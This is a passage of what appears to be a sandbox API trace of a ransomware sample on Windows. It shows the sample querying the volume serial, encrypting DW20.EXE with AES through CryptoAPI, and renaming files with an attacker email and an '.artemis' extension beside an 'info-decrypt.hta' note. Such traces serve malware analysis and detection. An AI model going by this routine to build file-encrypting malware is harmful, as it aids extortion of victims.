dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.606] WbemLocator:IUnknown:Release (This=0x781634) returned 0x2 [0198.606] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0198.606] CoTaskMemFree (pv=0x77dde8) [0198.606] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0198.606] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce6f4 | out: ppvObject=0x6bce6f4*=0x781654) returned 0x0 [0198.606] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce6b0 | out: ppvObject=0x6bce6b0*=0x0) returned 0x80004002 [0198.607] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce4cc | out: ppvObject=0x6bce4cc*=0x0) returned 0x80004002 [0198.608] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0198.608] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce00c | out: ppvObject=0x6bce00c*=0x0) returned 0x80004002 [0198.608] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdfbc | out: ppvObject=0x6bcdfbc*=0x0) returned 0x80004002 [0198.610] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdfc8 | out: ppvObject=0x6bcdfc8*=0x7815b4) returned 0x0 [0198.610] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7815b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdfd0 | out: pCid=0x6bcdfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.610] WbemLocator:IUnknown:Release (This=0x7815b4) returned 0x3 [0198.610] CoGetContextToken (in: pToken=0x6bce028 | out: pToken=0x6bce028) returned 0x0 [0198.610] CoGetContextToken (in: pToken=0x6bce430 | out: pToken=0x6bce430) returned 0x0 [0198.610] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4c0 | out: ppvObject=0x6bce4c0*=0x78163c) returned 0x0 [0198.611] WbemLocator:IRpcOptions:Query (in: This=0x78163c, pPrx=0x781654, dwProperty=2, pdwValue=0x6bce4e8 | out: pdwValue=0x6bce4e8) returned 0x80004002 [0198.611] WbemLocator:IUnknown:Release (This=0x78163c) returned 0x3 [0198.611] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0198.611] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0198.611] CoGetContextToken (in: pToken=0x6bce968 | out: pToken=0x6bce968) returned 0x0 [0198.611] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x6bcea38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcea34 | out: ppvObject=0x6bcea34*=0x6748264) returned 0x0 [0198.611] WbemLocator:IUnknown:AddRef (This=0x6748264) returned 0x4 [0198.611] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x3 [0198.611] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x2 [0198.611] SysStringLen (param_1=0x0) returned 0x0 [0198.611] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6bcedcc | out: puCount=0x6bcedcc*=0x0) returned 0x0 [0198.611] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedc8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedc8*=0x20, pszText=0x0) returned 0x0 [0198.611] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.611] CoGetContextToken (in: pToken=0x6bcea38 | out: pToken=0x6bcea38) returned 0x0 [0198.611] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0198.611] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce8cc | out: ppvObject=0x6bce8cc*=0x781654) returned 0x0 [0198.611] WbemLocator:IUnknown:Release (This=0x781654) returned 0x3 [0198.611] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0198.611] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedd0*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd0*=0x20, pszText=0x0) returned 0x0 [0198.611] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.611] IWbemServices:GetObject (in: This=0x6748264, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bced84*=0x0, ppCallResult=0x0 | out: ppObject=0x6bced84*=0x673c128, ppCallResult=0x0) returned 0x0 [0199.365] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x6bced84 | out: puCount=0x6bced84*=0x2) returned 0x0 [0199.365] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6bced80*=0x0, pszText=0x0 | out: puBuffLength=0x6bced80*=0xf, pszText=0x0) returned 0x0 [0199.365] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6bced80*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.365] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3511264*=0, plFlavor=0x3511268*=0 | out: pVal=0x6bced80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3511264*=8, plFlavor=0x3511268*=0) returned 0x0 [0199.365] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.365] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.365] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3511264*=8, plFlavor=0x3511268*=0 | out: pVal=0x6bced88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3511264*=8, plFlavor=0x3511268*=0) returned 0x0 [0199.365] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.365] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.365] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0199.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x68 [0199.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcede8) returned 1 [0199.366] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), fInfoLevelId=0x0, lpFileInformation=0x6bcee64 | out: lpFileInformation=0x6bcee64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d4a0ae0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x14e980)) returned 1 [0199.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcede4) returned 1 [0199.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0199.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0199.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0199.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0199.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee8c) returned 1 [0199.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcef08 | out: lpFileInformation=0x6bcef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b0c5f80, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x1b0c5f80, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x1b0c5f80, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0199.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee88) returned 1 [0199.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bce9a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0199.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee54) returned 1 [0199.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), fInfoLevelId=0x0, lpFileInformation=0x3511934 | out: lpFileInformation=0x3511934*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88)) returned 1 [0199.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee50) returned 1 [0199.371] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bce894, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0199.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced88) returned 1 [0199.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0199.371] GetFileType (hFile=0x3dc) returned 0x1 [0199.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced84) returned 1 [0199.371] GetFileType (hFile=0x3dc) returned 0x1 [0199.371] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x6bcee90 | out: lpFileSizeHigh=0x6bcee90*=0x0) returned 0xf2b88 [0199.374] ReadFile (in: hFile=0x3dc, lpBuffer=0x2d22fa28, nNumberOfBytesToRead=0xf2b88, lpNumberOfBytesRead=0x6bcee3c, lpOverlapped=0x0 | out: lpBuffer=0x2d22fa28*, lpNumberOfBytesRead=0x6bcee3c*=0xf2b88, lpOverlapped=0x0) returned 1 [0199.403] CloseHandle (hObject=0x3dc) returned 1 [0199.403] CryptAcquireContextW (in: phProv=0x6bceddc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bceddc*=0x7a8fe0) returned 1 [0199.404] CryptGenRandom (in: hProv=0x7a8fe0, dwLen=0x10, pbBuffer=0x3511e54 | out: pbBuffer=0x3511e54) returned 1 [0199.892] CryptImportKey (in: hProv=0x7a8fe0, pbData=0x35da878, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcedac | out: phKey=0x6bcedac*=0x77b5b0) returned 1 [0199.892] CryptContextAddRef (hProv=0x7a8fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.892] CryptContextAddRef (hProv=0x7a8fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.892] CryptDuplicateKey (in: hKey=0x77b5b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bced9c | out: phKey=0x6bced9c*=0x77aeb0) returned 1 [0199.892] CryptContextAddRef (hProv=0x7a8fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.892] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x4, pbData=0x35da958*=0x1, dwFlags=0x0) returned 1 [0199.892] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x1, pbData=0x35da924, dwFlags=0x0) returned 1 [0199.901] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d449398*, pdwDataLen=0x6bcee08*=0xf2b90, dwBufLen=0xf2b90 | out: pbData=0x2d449398*, pdwDataLen=0x6bcee08*=0xf2b90) returned 1 [0199.910] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35da980*, pdwDataLen=0x6bcee10*=0x0, dwBufLen=0x10 | out: pbData=0x35da980*, pdwDataLen=0x6bcee10*=0x10) returned 1 [0200.268] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0200.268] CryptReleaseContext (hProv=0x7a8fe0, dwFlags=0x0) returned 1 [0200.269] CryptReleaseContext (hProv=0x7a8fe0, dwFlags=0x0) returned 1 [0200.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bce880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0200.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced74) returned 1 [0200.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0200.278] GetFileType (hFile=0x5a4) returned 0x1 [0200.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced70) returned 1 [0200.278] GetFileType (hFile=0x5a4) returned 0x1 [0200.279] WriteFile (in: hFile=0x5a4, lpBuffer=0x2e730f48*, nNumberOfBytesToWrite=0xf2da0, lpNumberOfBytesWritten=0x6bcee30, lpOverlapped=0x0 | out: lpBuffer=0x2e730f48*, lpNumberOfBytesWritten=0x6bcee30*=0xf2da0, lpOverlapped=0x0) returned 1 [0200.300] CloseHandle (hObject=0x5a4) returned 1 [0200.449] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0200.449] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0200.449] CoTaskMemFree (pv=0x9825530) [0200.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0200.450] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedb0 | out: ppv=0x6bcedb0*=0x72015c) returned 0x0 [0200.450] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bceda8 | out: pAptType=0x6bceda8*=1) returned 0x0 [0200.450] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedac | out: ppvObject=0x6bcedac*=0x0) returned 0x80004002 [0200.450] IUnknown:Release (This=0x72015c) returned 0x1 [0200.452] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce718 | out: ppv=0x6bce718*=0x6736ee8) returned 0x0 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce930 | out: ppvObject=0x6bce930*=0x0) returned 0x80004002 [0200.452] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ee8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce944 | out: ppvObject=0x6bce944*=0x6738af0) returned 0x0 [0200.452] WbemDefPath:IUnknown:Release (This=0x6736ee8) returned 0x0 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce564 | out: ppvObject=0x6bce564*=0x6738af0) returned 0x0 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce520 | out: ppvObject=0x6bce520*=0x0) returned 0x80004002 [0200.452] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde7c | out: ppvObject=0x6bcde7c*=0x0) returned 0x80004002 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde2c | out: ppvObject=0x6bcde2c*=0x0) returned 0x80004002 [0200.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde38 | out: ppvObject=0x6bcde38*=0x77bff8) returned 0x0 [0200.452] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bff8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde40 | out: pCid=0x6bcde40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.453] WbemDefPath:IUnknown:Release (This=0x77bff8) returned 0x3 [0200.453] CoGetContextToken (in: pToken=0x6bcde98 | out: pToken=0x6bcde98) returned 0x0 [0200.453] CoGetContextToken (in: pToken=0x6bcde48 | out: pToken=0x6bcde48) returned 0x0 [0200.453] CoGetContextToken (in: pToken=0x6bce2a0 | out: pToken=0x6bce2a0) returned 0x0 [0200.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce330 | out: ppvObject=0x6bce330*=0x0) returned 0x80004002 [0200.453] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0200.453] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0200.453] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0200.453] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0200.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x6bcec58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec54 | out: ppvObject=0x6bcec54*=0x6738af0) returned 0x0 [0200.453] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0200.453] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0200.453] WbemDefPath:IWbemPath:SetText (This=0x6738af0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedd8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd8*=0x20, pszText=0x0) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0200.453] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6bced5c | out: puCount=0x6bced5c*=0x0) returned 0x0 [0200.454] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bced48 | out: puCount=0x6bced48*=0x2) returned 0x0 [0200.454] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0x0, pszText=0x0 | out: puBuffLength=0x6bced44*=0xf, pszText=0x0) returned 0x0 [0200.454] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.454] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcecf8 | out: ppv=0x6bcecf8*=0x72015c) returned 0x0 [0200.454] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcecf0 | out: pAptType=0x6bcecf0*=1) returned 0x0 [0200.454] IUnknown:QueryInterface (in: This=0x72015c, 